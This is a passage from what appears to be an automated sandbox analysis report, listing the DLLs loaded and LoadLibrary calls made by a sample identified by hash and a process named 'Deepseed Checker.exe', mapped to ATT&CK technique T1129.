\"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\PSAPI.DLL\" at base 0\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"CRYPTSP.DLL\" at base 75310000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 750a0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\NLSSORTING.DLL\" at base 72cd0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CONFIGURATION\\96F7EDB07B12303F0EC2595C7F3778C7\\SYSTEM.CONFIGURATION.NI.DLL\" at base 6a990000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.XML\\15AF16D373CF0528CB74FC73D365FDBF\\SYSTEM.XML.NI.DLL\" at base 610a0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"NTDLL.DLL\" at base 77a00000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"SHELL32.DLL\" at base 76b80000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76b10000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"PROFAPI.DLL\" at base 75910000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\BCRYPT.DLL\" at base 0\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"BCRYPT.DLL\" at base 75420000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\SHELL32.DLL\" at base 0\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\IPHLPAPI.DLL\" at base 0\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"IPHLPAPI.DLL\" at base 73c50000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"DNSAPI.DLL\" at base 75190000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73b20000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"DHCPCSVC.DLL\" at base 73b00000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\RASAPI32.DLL\" at base 0\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"RASAPI32.DLL\" at base 72280000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"RTUTILS.DLL\" at base 73710000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 76b10000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 76b10000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\WS2_32.DLL\" at base 0\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"WS2_32.DLL\" at base 763a0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 752d0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74e30000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 752c0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"RASMAN.DLL\" at base 6db80000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\WINHTTP.DLL\" at base 0\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"WINHTTP.DLL\" at base 71700000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"CREDSSP.DLL\" at base 74fd0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"NSI.DLL\" at base 76390000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"CFGMGR32.DLL\" at base 75930000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"OLEAUT32.DLL\" at base 761d0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 743b0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"PROPSYS.DLL\" at base 74500000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"COMCTL32.DLL\" at base 747a0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"CLBCATQ.DLL\" at base 76a80000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74500000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"NTMARTA.DLL\" at base 74d70000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"APPHELP.DLL\" at base 757b0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6e930000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 76b80000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75ee0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"SETUPAPI.DLL\" at base 76630000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%PROGRAMFILES%\\MICROS~3\\OFFICE14\\GROOVEEX.DLL\" at base 6faa0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%PROGRAMFILES%\\COMMON~1\\MICROS~1\\OFFICE14\\CULTURES\\OFFICE.ODF\" at base 6f680000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75aa0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 764e0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"SECUR32.DLL\" at base 75630000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75ab0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 71010000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 757b0000\n \"Deepseed Checker.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 712d0000\n \"Deepseed Checker.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"Deepseed Checker.exe\" loaded module \"KERNEL32\" at base 75ee0000\n \"Deepseed Checker.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"Deepseed Checker.exe\" loaded module \"ADVAPI32.DLL\" at base 777d0000\n \"Deepseed Checker.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6add0000\n \"Deepseed Checker.exe\" loaded module \"SHLWAPI.DLL\" at base 76400000\n \"Deepseed Checker.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"Deepseed Checker.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"Deepseed Checker.exe\" loaded module \"VERSION.DLL\" at base 74da0000\n \"Deepseed Checker.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 64d20000\n \"Deepseed Checker.exe\" loaded module \"USER32.DLL\" at base 77b70000\n \"Deepseed Checker.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"Deepseed Checker.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"Deepseed Checker.exe\" loaded module \"MSCOREE.DLL\" at base 6ae60000\n \"Deepseed Checker.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"Deepseed Checker.exe\" loaded module \"PSAPI.DLL\" at base 77c40000\n \"Deepseed Checker.exe\" loaded module \"RPCRT4.DLL\" at base 77880000\n \"Deepseed Checker.exe\" loaded module \"KERNEL32.DLL\" at base 75ee0000\n \"Deepseed Checker.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 62500000\n \"Deepseed Checker.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"Deepseed Checker.exe\" loaded module \"OLE32.DLL\" at base 76070000\n \"Deepseed Checker.exe\" loaded module \"CRYPTBASE.DLL\" at base 75800000\n \"Deepseed Checker.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 743b0000\n \"Deepseed Checker.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 72ce0000\n \"Deepseed Checker.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 6c410000\n \"Deepseed Checker.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 642c0000\n \"Deepseed Checker.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.DRAWING\\F7568D7F1B9D356F64779B4C0927CFB3\\SYSTEM.DRAWING.NI.DLL\" at base 68c90000\n \"Deepseed Checker.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.WINDOWS.FORMS\\C9A4CBC00F690A9E3CDDFC400F6E85BB\\SYSTEM.WINDOWS.FORMS.NI.DLL\" at base 61690000\n \"Deepseed Checker.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM.WINDOWS.FORMS\\V4.0_4.0.0.0__B77A5C561934E089\\UXTHEME.DLL\" at base 0\n \"Deepseed Checker.exe\" loaded module \"UXTHEME.DLL\" at base 743b0000\n \"Deepseed Checker.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\VERSION.DLL\" at base 0\n \"Deepseed Checker.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\DIASYMREADER.DLL\" at base 6a990000\n \"Deepseed Checker.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CORE\\31FAE3290FAD30C31C98651462D22724\\SYSTEM.CORE.NI.DLL\" at base 63aa0000\n \"Deepseed Checker.exe\" loaded module \"CRYPTSP.DLL\" at base 75310000\n \"Deepseed Checker.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 750a0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\a891970b44db9e340c3ef3efa95b793c\\Microsoft.VisualBasic.ni.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Net.Http\\c1f72f0ca85cb675a88efe8f2067f7c8\\System.Net.Http.ni.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\en-US\\tzres.dll.mui (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter iphlpapi.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter rasapi32.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter ws2_32.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter RASMAN.DLL (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter rtutils.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter RPCRT4.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter NSI.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter CFGMGR32.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003276)\n 